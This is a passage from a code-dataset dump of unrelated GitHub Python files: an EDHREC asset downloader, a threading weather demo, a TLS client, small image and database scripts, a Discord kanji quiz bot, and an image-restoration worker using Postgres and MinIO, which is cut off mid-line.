\"https://json.edhrec.com/tribes.json\"\n filepath = f\"{TRIBES_FILEPATH}/tribes.json\"\n request_asset_and_save(url, filepath)\n\n asset = retrieve_asset(\"tribes/tribes.json\")\n for tribe in asset[\"container\"][\"json_dict\"][\"cardlists\"][0][\"cardviews\"]:\n tribe_url = f\"{BASE_URL}{tribe['url']}.json\"\n slug = slugify(tribe[\"name\"])\n theme_filepath = f\"{TRIBES_FILEPATH}/tribe-{slug}.json\"\n request_asset_and_save(tribe_url, theme_filepath)\n\n\ndef request_asset_and_save(url, filepath, overwrite=False):\n if os.path.isfile(filepath) and not overwrite:\n return\n if overwrite:\n os.remove(filepath)\n print(f\"Saving {filepath}\")\n response = requests.get(url)\n if response.status_code != 200:\n raise Exception(f\"Could not get {url}\")\n with open(filepath, \"w+\") as f:\n f.write(response.text)\n\n\ndef save_asset_for_commander(slug):\n filepath = f\"{COMMANDERS_FILEPATH}/{slug}.json\"\n url = f\"{COMMANDERS_URL}/{slug}.json\"\n request_asset_and_save(url=url, filepath=filepath)\n\n\ndef retrieve_asset(filename):\n with open(f\"{FILEPATH}/{filename}\") as f:\n data = json.loads(f.read())\n return data\n\n\ndef is_not_asset_file(filepath):\n assets = [\n \"tribes.json\",\n \"themes.json\",\n \"themes-2.json\",\n ]\n return filepath not in assets\n\n\ndef save_asset_for_card(slug):\n if \"/\" in slug:\n # Eg theme or tribe cards, or partner commanders\n slug = slug.split(\"/\")[0]\n filepath = f\"{CARDS_FILEPATH}/{slug}.json\"\n url = f\"{CARDS_URL}/{slug}.json\"\n request_asset_and_save(url=url, filepath=filepath)\n","repo_name":"RobertTownley/MagicTheAutomating","sub_path":"assets.py","file_name":"assets.py","file_ext":"py","file_size_in_byte":3871,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"38255013774","text":"import threading\nimport time\nimport requests\nimport multiprocessing\n\n\nfirst_city = \"Lviv\", 
\"https://api.open-meteo.com/v1/forecast?latitude=49.84&longitude=24.02&hourly=temperature_2m,relativehumidity_2m,windspeed_10m\"\nsecond_city = \"Kyiv\", \"https://api.open-meteo.com/v1/forecast?latitude=50.45&longitude=30.52&hourly=temperature_2m,relativehumidity_2m,windspeed_10m\"\nthird_city = \"Warsaw\", \"https://api.open-meteo.com/v1/forecast?latitude=52.23&longitude=21.01&hourly=temperature_2m,relativehumidity_2m,windspeed_10m\"\nfourth_city = \"London\", \"https://api.open-meteo.com/v1/forecast?latitude=51.51&longitude=-0.131&hourly=temperature_2m,relativehumidity_2m,windspeed_10m\"\nfifth_city = \"Barcelona\", \"https://api.open-meteo.com/v1/forecast?latitude=41.39&longitude=2.16&hourly=temperature_2m,relativehumidity_2m,windspeed_10m\"\nlist_of_today_temperatures = []\n\n\ndef get_weather_forecast(link):\n resp = (requests.get(\n link[1]))\n list_of_temperatures = resp.json()[\"hourly\"][\"temperature_2m\"]\n average_temperature = (sum(list_of_temperatures) / len(list_of_temperatures))\n print(f\"Average temperature in the city {link[0]} - {average_temperature}\")\n today_temperature = [link[0], list_of_temperatures[0]]\n list_of_today_temperatures.append(today_temperature)\n\n\n# looking for the maximum temperature right now\ndef max_temperature_now():\n max_temperature_today = max(list_of_today_temperatures, key=lambda x: x[1])\n print(f\"Now the hottest in {max_temperature_today[0]} - {max_temperature_today[1]}\")\n\n\n# with threads=========================================================\ndef threads_method():\n threads = []\n start_threads_time = time.time()\n t1 = threading.Thread(target=get_weather_forecast(first_city))\n t2 = threading.Thread(target=get_weather_forecast(second_city))\n t3 = threading.Thread(target=get_weather_forecast(third_city))\n t4 = threading.Thread(target=get_weather_forecast(fourth_city))\n t5 = threading.Thread(target=get_weather_forecast(fifth_city))\n threads.append(t1)\n threads.append(t2)\n threads.append(t3)\n threads.append(t4)\n threads.append(t5)\n for t in threads:\n t.start()\n for t in threads:\n t.join()\n end_threads_time = time.time()\n max_temperature_now()\n print(f\"Program ended in {end_threads_time - start_threads_time}\")\n\n\n# with multiprocessing ================================================\ndef multiproc_method():\n print(\">>> multiprocessing\")\n process = []\n start_multiprocessing_time = time.time()\n m1 = multiprocessing.Process(target=get_weather_forecast(first_city))\n m2 = multiprocessing.Process(target=get_weather_forecast(second_city))\n m3 = multiprocessing.Process(target=get_weather_forecast(third_city))\n m4 = multiprocessing.Process(target=get_weather_forecast(fourth_city))\n m5 = multiprocessing.Process(target=get_weather_forecast(fifth_city))\n process.append(m1)\n process.append(m2)\n process.append(m3)\n process.append(m4)\n process.append(m5)\n for m in process:\n m.start()\n for m in process:\n m.join()\n end_multiprocessing_time = time.time()\n max_temperature_now()\n print(f\"Program ended in {end_multiprocessing_time - start_multiprocessing_time}\")\n\n\nif __name__ == \"__main__\":\n threads_method()\n multiproc_method()\n","repo_name":"ellinhoms9/robot_dreams_py","sub_path":"HW16/task1-3.py","file_name":"task1-3.py","file_ext":"py","file_size_in_byte":3328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"2601067826","text":"\nimport socket\nimport ssl\nimport time\n\n# IP address and the port number of the server\nSERVER = 
socket.gethostbyname(socket.gethostname())\nPORT = 15000\nSERVER_ADDRESS = (SERVER, PORT)\n\n# Create an SSL context\ncontext = ssl.SSLContext()\ncontext.verify_mode = ssl.CERT_REQUIRED\n\n# Load CA certificate with which the client will validate the server certificate\ncontext.load_verify_locations(\"./ca.crt\")\n\n# Load client certificate\ncontext.load_cert_chain(certfile=\"./client1.crt\", keyfile=\"./client1.key\")\n\n# Create a client socket\nclientSocket = socket.socket()\n\n# Make the client socket suitable for secure communication\nsecureClientSocket = context.wrap_socket(clientSocket)\nsecureClientSocket.connect(SERVER_ADDRESS)\n\n# Obtain the certificate from the server\nserver_cert = secureClientSocket.getpeercert()\n\nif not server_cert:\n    raise Exception(\"Unable to retrieve server certificate\")\n\n# Validate whether the Certificate is indeed issued to the server\n# (the emptiness check above must come first, since an absent certificate cannot be indexed)\nsubject = dict(item[0] for item in server_cert['subject'])\ncommonName = subject['commonName']  # NOTE: extracted but never compared against the expected server name\n\nnotAfterTimestamp = ssl.cert_time_to_seconds(server_cert['notAfter'])\nnotBeforeTimestamp = ssl.cert_time_to_seconds(server_cert['notBefore'])\ncurrentTimeStamp = time.time()\n\nif currentTimeStamp > notAfterTimestamp:\n    raise Exception(\"Expired server certificate\")\n    \nif currentTimeStamp < notBeforeTimestamp:\n    raise Exception(\"Server certificate not yet active\")\n\n# Safe to proceed with the communication\nmsgReceived = secureClientSocket.recv(1024)\nprint(f\"Secure communication received from server: {msgReceived.decode()}\")\n\n# Close the sockets\nsecureClientSocket.close()\nclientSocket.close()\n","repo_name":"AnirudhAchal/Computer-Networks-Lab","sub_path":"Week 5/Q1/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"35018284726","text":"import click\nimport numpy as np\nfrom PIL import Image\nfrom numpy import asarray\n\ndef convert(infile, outfile=None):\n\timage = Image.open(infile)\n\tdata = asarray(image)\n\tprint(f\"Image size: {data.shape}\")\n\twith open(outfile, 'wb') as f:\n\t\tfor y in range(data.shape[0]):\n\t\t\tfor x in range(data.shape[1]):\n\t\t\t\tv = np.uint16(data[y][x])\n\t\t\t\tf.write(v)\n\n@click.command()\n@click.argument(\"infile\")\n@click.option(\"--outfile\", default=None, help=\"specify output filename (default: replace filename extension with .raw)\")\ndef cli(infile, outfile):\n\tif outfile is None:\n\t\tparts = infile.split('.')\n\t\tparts[-1] = \"raw\"\n\t\toutfile = \".\".join(parts)\n\tconvert(infile, outfile)","repo_name":"bwulff/toraw","sub_path":"src/toraw/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"}
{"seq_id":"13652233337","text":"# HTML with Python: retrieve data from a web page\n\nimport pandas as pd\n\nurl = 'https://es.wikipedia.org/wiki/Anexo:Finales_de_la_Copa_Mundial_de_F%C3%BAtbol'\n\ndataframe = pd.io.html.read_html(url)\nprint(dataframe)\n\n# CONTINUED IN GOOGLE DRIVE yomacolor42\n\n\n","repo_name":"yoma75/ejercicios-de-python","sub_path":"HTML y excel/html.py","file_name":"html.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"}
{"seq_id":"21067732218","text":"from __future__ import print_function\nfrom datetime import date, datetime, timedelta\n\nimport mysql.connector\n\ncnx = 
mysql.connector.connect(user='sscm', database='sscm')\n\ncursor = cnx.cursor()\n\ntomorrow = datetime.now().date() + timedelta(days=1)\n\ninsert_query = (\"INSERT INTO item_types \"\n \"(name, description) \"\n \"VALUES (%s, %s)\")\n\ninsert_data = ('Lock','Lock mechanism for rotary table')\n\n\n# Insert new employee\ncursor.execute(insert_query, insert_data)\nid = cursor.lastrowid\n\nprint (\"type created with id: {}\".format(id))\n\n# Make sure data is committed to the database\ncnx.commit()\n\ncursor.close()\ncnx.close()","repo_name":"OlgaRa/sscm","sub_path":"python/insert_mysql.py","file_name":"insert_mysql.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"30220884780","text":"import dlib\nimport cv2\nfrom imutils import face_utils\nimport imutils\nimport numpy as np\nimport scipy.interpolate\nfrom copy import deepcopy\nfrom colordict import ColorDict\nfrom PIL import Image\nimport argparse\n\nap = argparse.ArgumentParser()\nap.add_argument('-f', '--filename', required=False,\n help='[Str] File name of image to import',\n default='nicolascage.jpg')\nap.add_argument('-l', '--lipstick', required=False, action='store_false',\n help='Passing this argument removes lipstick', default=True)\nap.add_argument('-e', '--eyeliner', required=False, action='store_false',\n help='Passing this argument removes eyeliner', default=True)\nap.add_argument('-b', '--blush', required=False, action='store_false',\n help='Passing this argument removes blush', default=True)\nap.add_argument('-n', '--nosering', required=False, action='store_false',\n help='Passing this argument removes nose ring', default=True)\nap.add_argument('--lipcolor', required=False, help='[Str] lipstick color', default='red')\nap.add_argument('--eyecolor', required=False, help='[Str] eyeliner color', default='black')\nap.add_argument('--blushcolor', required=False, help='[Str] blush color', default='red')\nap.add_argument('-s', '--showsteps', required=False, action='store_true',\n help='Passing this argument will show output images of each step. 
Press keyboard to continue through outputs', default=False)\nargs = vars(ap.parse_args())\n\n\nclass ApplyMakeup:\n def __init__(self, image, show_steps=False, lip_color='red', eyeliner_color='black', blush_color='red', colors=ColorDict()):\n self.image = cv2.imread(image)\n self.show_steps = show_steps\n self.lip_color = colors[lip_color]\n self.eyeliner_color = colors[eyeliner_color]\n self.blush_color = colors[blush_color]\n\n # Landmarks\n self.all = None\n self.lips = None\n self.right_eye = None\n self.left_eye = None\n\n def get_landmarks(self):\n # Initialize dlib face detector and facial landmark predictor\n detector = dlib.get_frontal_face_detector()\n predictor = dlib.shape_predictor('shape_predictor_68_face_landmarks.dat')\n\n # Load input image\n image = deepcopy(self.image)\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n # Detect face\n face = detector(gray, 1)[0]\n\n # Determine facial landmarks for the face region, convert landmark x-y coordinates to numpy array\n landmarks_pre = predictor(gray, face)\n landmarks = face_utils.shape_to_np(landmarks_pre)\n self.all = landmarks\n self.lips = landmarks[48:]\n self.right_eye = landmarks[42:48]\n self.left_eye = landmarks[36:42]\n\n if self.show_steps:\n # Iterate over x-y coordinates of facial landmarks and draw them on image\n for i, (x, y) in enumerate(landmarks):\n cv2.circle(image, (x, y), 3, (0, 0, 255), -1)\n cv2.putText(image, str(i), (x, y-10), cv2.FONT_HERSHEY_SIMPLEX, 0.3, (0, 0, 0), 1)\n\n # Show output image with facial landmarks\n cv2.imshow('Landmarks', image)\n cv2.waitKey(0)\n\n def get_mask(self, region_pts):\n # Create binary mask of ROI\n mask = np.zeros_like(self.image)\n if len(region_pts) > 2:\n mask = cv2.fillPoly(mask, [region_pts], (255, 255, 255))\n else:\n cv2.circle(mask, region_pts, int(len(mask)/17), (255, 255, 255), -1)\n\n # Show mask\n if self.show_steps:\n cv2.imshow('Mask', mask)\n cv2.waitKey(0)\n return mask\n\n def color_lips(self):\n mask = self.get_mask(self.lips)\n lip_color = np.zeros_like(mask)\n lip_color[:] = self.lip_color[::-1]\n colored_mask = cv2.bitwise_and(mask, lip_color)\n\n # Blur colored mask for realism\n colored_mask = cv2.GaussianBlur(colored_mask, (7, 7), 10)\n\n # Combine colored mask with original\n self.image = cv2.addWeighted(self.image, 1, colored_mask, 0.4, 0)\n\n # Show combined image\n if self.show_steps:\n cv2.imshow('Colored Mask', self.image)\n cv2.waitKey(0)\n\n def eye_liner(self, eye):\n # Create image copy for combining\n overlay = self.image.copy()\n\n # Extract upper and lower sections of eye landmarks\n upper = eye[:4]\n lower = np.vstack((eye[0], eye[3:]))\n\n # Initialize extrapolated point lists\n i_x_extrap = []\n i_y_extrap = []\n\n # Initialize counter\n j = 0\n\n # Iterate over upper and lower sections of eye landmarks\n for i in [upper, lower]:\n\n # Declare upper and lower sections as lists of x and y coordinates\n i_x = list(i[:, 0])\n i_y = list(i[:, 1])\n\n # Move landmarks away from the eye slightly for realism\n # j=0: upper, j=1: lower\n if j < 1:\n i_y[0] -= 5\n i_y[1] -= 4\n i_y[2] -= 4\n i_y[3] -= 5\n\n # Create a copy of y coordinates and move farther from original points\n i_y_new = deepcopy(i_y)\n i_y_new[1] -= 3\n i_y_new[2] -= 3\n else:\n i_y[0] += 1\n i_y[1] += 4\n i_y[2] += 4\n i_y[3] += 3\n i_y_new = deepcopy(i_y)\n i_y_new[1] += 3\n i_y_new[2] += 3\n\n # Interpolate curves from points\n curve_i = scipy.interpolate.interp1d(i_x, i_y, 'quadratic')\n curve_i_new = scipy.interpolate.interp1d(i_x, i_y_new, 'quadratic')\n\n # 
Create new list of x points and use curve function to obtain smoother list of points\n for point in np.arange(np.min(i_x), np.max(i_x)):\n i_x_extrap.append(point)\n i_y_extrap.append(int(curve_i(point)))\n i_x_extrap.append(point)\n i_y_extrap.append(int(curve_i_new(point)))\n\n # Add to counter to force into if statement for lower\n j += 1\n\n # Declare array and add extrapolated points back into pairs\n i_new = np.zeros((len(i_x_extrap), 2), np.int32)\n i_new[:, 0] = i_x_extrap\n i_new[:, 1] = i_y_extrap\n\n # Add points onto image copy\n for (x, y) in i_new:\n cv2.circle(overlay, (x, y), 2, self.eyeliner_color[::-1], -1)\n\n # Combine copy and original\n self.image = cv2.addWeighted(overlay, 0.3, self.image, 0.7, 0)\n\n # Show result\n if self.show_steps:\n cv2.imshow(\"Eye\", self.image)\n cv2.waitKey(0)\n\n def blush(self, landmarks):\n # Manually chosen points to find a midpoint\n L_points = np.vstack((landmarks[48], landmarks[17]))\n R_points = np.vstack((landmarks[54], landmarks[26]))\n\n for i in [L_points, R_points]:\n # Find midpoint\n i_centroid = (int(np.sum(i[:, 0])/2), int(np.sum(i[:, 1])/2))\n\n # Get mask and color\n mask = self.get_mask(i_centroid)\n blush_color = np.zeros_like(mask)\n blush_color[:] = self.blush_color[::-1]\n\n # Combine, blur, combine\n colored_mask = cv2.bitwise_and(mask, blush_color)\n colored_mask = cv2.GaussianBlur(colored_mask, (77, 77), 1400)\n self.image = cv2.addWeighted(self.image, 1, colored_mask, 0.4, 0)\n\n # Show combined image\n if self.show_steps:\n cv2.imshow('Colored Mask', self.image)\n cv2.waitKey(0)\n\n def nose_ring(self, nose_ring_img):\n # Center nostril points\n nose_pts = (self.all[32], self.all[34])\n\n # Difference between points for image resize\n dx = nose_pts[1][0] - nose_pts[0][0]\n dy = nose_pts[0][1] - nose_pts[1][1]\n\n # Convert main image to PIL\n pil_image = cv2.cvtColor(self.image, cv2.COLOR_BGR2RGB)\n pil_image = Image.fromarray(pil_image)\n\n # Load nose ring image in PIL to maintain alpha channel\n nose_ring = Image.open(nose_ring_img)\n\n # Convert to array for resize and rotate\n nose_ring = np.array(nose_ring)\n resized = imutils.resize(nose_ring, width=dx)\n rotated = imutils.rotate_bound(resized, -np.degrees(np.arctan2(dy, dx)))\n\n # Convert back to PIL for combining\n nose_ring = Image.fromarray(rotated)\n\n # Combine\n pil_image.paste(nose_ring, (nose_pts[0][0], nose_pts[0][1]-15), nose_ring)\n\n # Convert back to array and switch to BGR\n self.image = np.array(pil_image)\n self.image = self.image[:, :, ::-1]\n\n # Show\n if self.show_steps:\n cv2.imshow('Nose Ring', self.image)\n cv2.waitKey(0)\n\n\nif __name__ == '__main__':\n\n # Initialize makeup image object\n makeup_image = ApplyMakeup(args['filename'],\n lip_color=args['lipcolor'],\n eyeliner_color=args['eyecolor'],\n blush_color=args['blushcolor'],\n show_steps=args['showsteps'])\n\n # Obtain facial landmarks\n makeup_image.get_landmarks()\n\n # Apply lipstick\n if args['lipstick']:\n makeup_image.color_lips()\n\n # Apply blush\n if args['blush']:\n makeup_image.blush(makeup_image.all)\n\n # Apply eyeliner\n if args['eyeliner']:\n makeup_image.eye_liner(makeup_image.right_eye)\n makeup_image.eye_liner(makeup_image.left_eye)\n\n # Apply nose ring\n if args['nosering']:\n makeup_image.nose_ring('nose_ring.png')\n\n # Write image to file\n cv2.imwrite('{}_with_makeup.jpg'.format(args['filename'].split('.')[0]), makeup_image.image)\n\n # Show final output\n print('[INFO] Displaying final output...')\n cv2.imshow(\"Final output - Exit with 
keystroke\", makeup_image.image)\n cv2.waitKey(0)\n","repo_name":"joeyhark/makeup_applier","sub_path":"apply_makeup.py","file_name":"apply_makeup.py","file_ext":"py","file_size_in_byte":9980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71909904224","text":"from torchvision import transforms\n\nNIH_normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\nChexPert_normalize = transforms.Normalize(mean=[0.485],\n std=[0.229])\n\n# transforms.RandomHorizontalFlip() not used because some disease might be more likely to the present in a specific lung (lelf/rigth)\nNIH_transform = transforms.Compose([transforms.ToPILImage(), \n transforms.Resize(256),\n transforms.ToTensor(),\n NIH_normalize])\n\nChexPert_transform = transforms.Compose([transforms.Resize([256,256]),\n transforms.ToTensor(),\n ChexPert_normalize])","repo_name":"hphp777/FedBalance_clean","sub_path":"data/preprocessing/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"13435330659","text":"from time import time\nt1 = time()\n\nimport matplotlib.pyplot as plt\nfrom numpy import zeros,arange\nfrom math import pi\n\n\nfrom mcCircle import *\n\nwidth = 400\nheight = 400\na = 200\nb = 200\nr = 200\n\niterStart = 100\niterStep = 100\niterEnd = 10000\n\niterMarker = 10000\n\nmapArea = width*height\ncircleArea = pi*(r**2)\ncirclePercent = (circleArea/mapArea)*100\n\nif iterEnd > (pi*(r**2)):\n print(\"Sampling iteration is more than the circle area! Should be lower than %.0f.\" % pi*(r^2))\n\ni = 0\ntotalPercent = []\n\nfor mcIter in range(iterStart,iterEnd+iterStep,iterStep):\n map01 = zeros((width,height))\n pixIn, pixPercent = createCircle(width,height,a,b,r,mcIter,map01)\n totalPercent.append(pixPercent)\n i = i+1\n if mcIter % iterMarker == 0:\n print(\"Iteration to %d\" % mcIter)\n\nxAxis = arange(iterStart,iterEnd+iterStep,iterStep)\nfig,axs = plt.subplots()\naxs.plot(xAxis,totalPercent,linewidth=0.75,label='Analytic Calc.')\naxs.hlines(circlePercent,iterStart,iterEnd,color='r',linewidth=0.75,label='Monte Carlo Calc.')\naxs.set_xlabel('Sampling Frequency')\naxs.set_ylabel('Circle Percentage')\naxs.legend(loc='upper right')\n\nplt.show()\n\nt2 = time()\nts = (t2 - t1)/60\nprint('Execution time: ', ts,' minutes.')","repo_name":"shpratama/nanocaffeine","sub_path":"tahap01/mcRun01.py","file_name":"mcRun01.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"31747914390","text":"import os\nfrom typing import Optional\nimport random\nimport aiohttp\n\nimport dotenv\nimport hikari\nimport lightbulb\nfrom hikari import Intents\nimport asyncio\n\nfrom util_read_csv import build_db\n\ndotenv.load_dotenv()\nINTENTS = Intents.GUILD_MEMBERS | Intents.GUILDS\n\nbot = lightbulb.BotApp(\n os.environ[\"BOT_TOKEN\"],\n intents=hikari.Intents.ALL_MESSAGES,\n banner=None,\n)\n\n@bot.command\n@lightbulb.command(\"test\", description=\"Do the N5 test.\")\n@lightbulb.implements(lightbulb.SlashCommand)\nasync def test(ctx: lightbulb.SlashContext) -> None:\n file_name = 'N5_Kanji.csv'\n option_enum = {'a': 0, 'b': 1, 'c': 2, 'd': 3}\n db = build_db(file_name)\n candidate = random.sample(db.keys(), 16) # 10題,每題4個選項\n question_num = len(candidate)//4\n correct_count = 0\n\n await ctx.respond(\"Choose the correct 
definition, a, b, c or d.\")\n    for i in range(question_num):\n        option_list = [db[candidate[i*4]], db[candidate[i*4+1]], db[candidate[i*4+2]], db[candidate[i*4+3]]]\n        random.shuffle(option_list)\n\n        question = candidate[i*4] + \" means\" + \"\\n\" \\\n            + \"a) \" + option_list[0] + \"\\nb) \" + option_list[1] + \"\\nc) \" + option_list[2] + \"\\nd) \" + option_list[3]\n        await ctx.respond(question)\n\n        try:\n            # the user must send a message in the channel for the answer to be read\n            event = await ctx.bot.wait_for(hikari.MessageEvent, timeout=20, predicate=lambda e: e.content is not None)\n            # print(event.content)\n        except asyncio.TimeoutError:\n            await ctx.respond(\"Timeout!!\")\n        else:\n            ans = event.content\n            if ans in option_enum.keys():\n                if option_list[option_enum[ans]] == db[candidate[i*4]]:\n                    await ctx.respond(\"Nice Job!!\")\n                    correct_count += 1\n                else:\n                    await ctx.respond(\"You are wrong, the answer is ---> \" + db[candidate[i*4]])\n            else:\n                await ctx.respond(\"Not a valid answer\")\n    \n    comment = \"\"\n    if correct_count <= question_num//4:\n        comment = \"You suck!\"\n    elif correct_count >= (question_num*3)//4:\n        comment = \"You are great!\"\n    else:\n        comment = \"You are not bad~\"\n    \n    await ctx.respond(comment + \"\\nYour final score is \" + str(correct_count) + \"/\" + str(question_num))\n\nif __name__ == \"__main__\":\n    bot.run()","repo_name":"Joshmannb/JiaBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"44756956195","text":"from typing import Set\n\nclass Teacher:\n    def __init__(self, id: str, name: str, disciplines: Set[str]):\n        self.id = id\n        self.name = name\n        self.disciplines = disciplines\n    \n    def to_dict(self):\n        return {\n            \"id\": self.id,\n            \"name\" : self.name,\n            \"disciplines\": self.disciplines\n        }","repo_name":"rene-kt/qxd-ufc-open-api","sub_path":"model/teacher.py","file_name":"teacher.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"20119469466","text":"import psycopg2\nimport os\nimport time\nimport torch.cuda\nimport hashlib\nfrom minio import Minio\nfrom minio.error import S3Error\n\nclass Databases:\n    def __init__(self, host, dbname, user, pw, port, minio_host, minio_access_id, minio_access_pw):\n\n        # Wait for the DB to come up (retry for up to 15 seconds)\n        start_time = time.time()\n        while (time.time() - start_time) < 15 :\n            try: \n                self.conn = psycopg2.connect(host=host, dbname=dbname, user=user, password=pw, port=port)\n                self.curs = self.conn.cursor()\n                self.table_scheme = \"\"\"\n                CREATE TABLE image (\n                    id SERIAL PRIMARY KEY,\n                    username VARCHAR(30) REFERENCES user_account,\n                    image_name VARCHAR(100) NOT NULL,\n                    image_hash CHAR(64) NOT NULL,\n                    size int NOT NULL,\n                    added_date timestamp DEFAULT Now(),\n                    up int NOT NULL\n                )\n                \"\"\"\n                print(\"DB connected\")\n                \n                self.minioClient = Minio(\n                    minio_host,\n                    access_key=minio_access_id,\n                    secret_key=minio_access_pw,\n                    secure=False,\n                )\n\n                # check bucket.\n                found = self.minioClient.bucket_exists(\"images\")\n                if not found:\n                    raise S3Error(f\"bucket does not exist\")\n                break\n            except psycopg2.OperationalError as e:\n                print(e)\n                print(\"Waiting DB connection...\")\n                time.sleep(1)\n\n    \"\"\"\n    Initialize the database\n    _check_table() checks if the table exists\n    _create_table() creates the table\n    _drop_table() drops the table\n    \n    init_db() is called in main.py\n    \"\"\"\n    def _check_table(self):\n        self.curs.execute(\"SELECT EXISTS(SELECT * FROM 
information_schema.tables WHERE table_name=%s)\", ('image',))\n if not self.curs.fetchone()[0]:\n self._create_table()\n else:\n print(\"Table exists\")\n\n def _create_table(self):\n self.curs.execute(self.table_scheme)\n self.conn.commit()\n print(\"Table created\")\n\n def _drop_table(self):\n self.curs.execute(\"DROP TABLE image\")\n self.conn.commit()\n print(\"Table dropped\")\n\n def init_db(self, force_init=False):\n if force_init:\n self._drop_table()\n self._check_table()\n\n \"\"\"\n Check if there are any image that are not processed\n _check_unprocessed() checks if there are any unprocessed images, and return their's image_name as a list\n _check_pair() checks if there is a pair of images (LQ and SR) for the unprocessed image\n \n glance_db() is called in main.py\n \"\"\"\n def _check_unprocessed(self):\n \"\"\"\n TODO: check up type\n \"\"\"\n self.curs.execute(\"SELECT id FROM image WHERE up != -1 AND NOT EXISTS (SELECT 1 FROM processed_image WHERE id=image.id)\")\n unprocessed = self.curs.fetchall()\n unprocessed = [i[0] for i in unprocessed]\n # print(\"Unprocessed images: \", unprocessed)\n return unprocessed\n\n def _check_pair(self, unprocessed):\n processed = []\n for i in unprocessed:\n self.curs.execute(\"SELECT up FROM processed_image WHERE id = %s\", (i,))\n if self.curs.fetchone():\n\n \"\"\"\n check if the pair (same id, same up) exists\n \"\"\"\n self.curs.execute(\"SELECT up FROM image WHERE id = %s\", (i,))\n up = self.curs.fetchone()[0]\n self.curs.execute(\"SELECT up FROM processed_image WHERE id = %s\", (i,))\n pr_up = self.curs.fetchone()[0]\n\n if up == pr_up:\n processed.append(i)\n\n need_process = list(set(unprocessed) - set(processed))\n return need_process\n\n def glance_db(self):\n unprocessed = self._check_unprocessed()\n # need_process = self._check_pair(unprocessed)\n return unprocessed\n\n \"\"\"\n Process the image\n _download() downloads the image from the database\n _upload() uploads the processed image to the database\n \n process_db() is called in main.py\n \"\"\"\n def _download(self, image_id):\n image = {'id': image_id}\n self.curs.execute(\"SELECT username, image_name, image_hash, up FROM image WHERE id = %s\", (image_id,))\n (image['username'], image['image_name'], image['image_hash'], image['pr_type']) = self.curs.fetchone()\n\n image['image_file'] = self.minioClient.get_object(\"images\", image['image_hash']).read()\n\n path = './LQ/' + str(image['pr_type']) + '/' + str(image_id) + \".png\"\n f = open(path, 'wb')\n f.write(image['image_file'])\n f.close()\n print(\"Fetched image (id={0}) into path {1} | Owner: {2}\".format(image_id, path, image['username']))\n return image\n\n def _upload(self, image):\n pr_type = image['pr_type']\n if pr_type == -1:\n return\n elif pr_type == 0:\n path = '../RealSR/results/Sharpic-SR/DIV2K/' + str(image['id']) + \".png\"\n elif pr_type == 1:\n path = '../BOPB/result/old/final_output/' + str(image['id']) + \".png\"\n elif pr_type == 2:\n path = '../BOPB/result/old_w_scratch/final_output/' + str(image['id']) + \".png\"\n elif pr_type == 3:\n path = '../waifu2x/results/' + str(image['id']) + \".png\"\n else:\n raise ValueError(\"Error: up value is not 0, 1, 2 or 3\")\n print(\"Uploading \", path)\n assert os.path.exists(path), \"Error: path does not exist\"\n file_size = os.path.getsize(path)\n f = open(path, 'rb')\n\n file_data = f.read()\n\n # sha256 object create\n sha256 = hashlib.sha256()\n # sha256 update\n sha256.update(file_data)\n image['image_hash'] = sha256.hexdigest()\n\n 
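# content-addressed storage: the SHA-256 digest doubles as the MinIO object key,\n        # so identical processed images map to the same object\n        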
self.minioClient.fput_object(\"images\", image['image_hash'], path)\n\n # insert\n self.curs.execute(\"INSERT INTO processed_image(id, username, image_name, image_hash, size, up) VALUES (%s, %s, %s, %s, %s, %s) RETURNING id\",\n (image['id'], image['username'], image['image_name'], image['image_hash'], file_size, pr_type))\n self.conn.commit()\n f.close()\n print(\"Stored image(id={0}) into DB\".format(image['id']))\n\n def process_db(self, image_id_list):\n\n image_list = []\n for image_id in image_id_list:\n # pass\n image_list.append(self._download(image_id))\n\n import os\n # get name of all files in the directory\n if len(os.listdir('./LQ/0/')) != 0:\n print(\"SR processing does not support CPU\")\n print(\"ONLY support CUDA or MPS\")\n if torch.cuda.is_available():\n print(\"Using GPU\")\n os.system(\"../RealSR/codes/SR_CUDA.sh\")\n else:\n print(\"Using MPS\")\n os.system('../RealSR/codes/SR_MPS.sh')\n\n if len(os.listdir('./LQ/1/')) != 0:\n # change directory using os.chdir()\n os.chdir('../BOPB/')\n os.system('./runner/img_wo_scratches.sh')\n os.chdir('../connects/')\n\n if len(os.listdir('./LQ/2/')) != 0:\n os.chdir('../BOPB/')\n os.system('../BOPB/runner/img_w_scratches.sh')\n os.chdir('../connects/')\n\n if len(os.listdir('./LQ/3/')) != 0:\n os.chdir('../waifu2x/script_generator/')\n os.system('python load_scr_and_run.py')\n os.chdir('../../connects/')\n\n for image in image_list:\n self._upload(image)\n\n print(\"Finished processing\")\n\n \"\"\"\n Clear the local directory\n 1. Delete all files in the directory\n \"\"\"\n def clear_local(self):\n print(\"Clearing local directory ... \")\n for file in os.listdir('./LQ/0/'):\n os.remove('./LQ/0/' + file)\n for file in os.listdir('./LQ/1/'):\n os.remove('./LQ/1/' + file)\n for file in os.listdir('./LQ/2/'):\n os.remove('./LQ/2/' + file)\n for file in 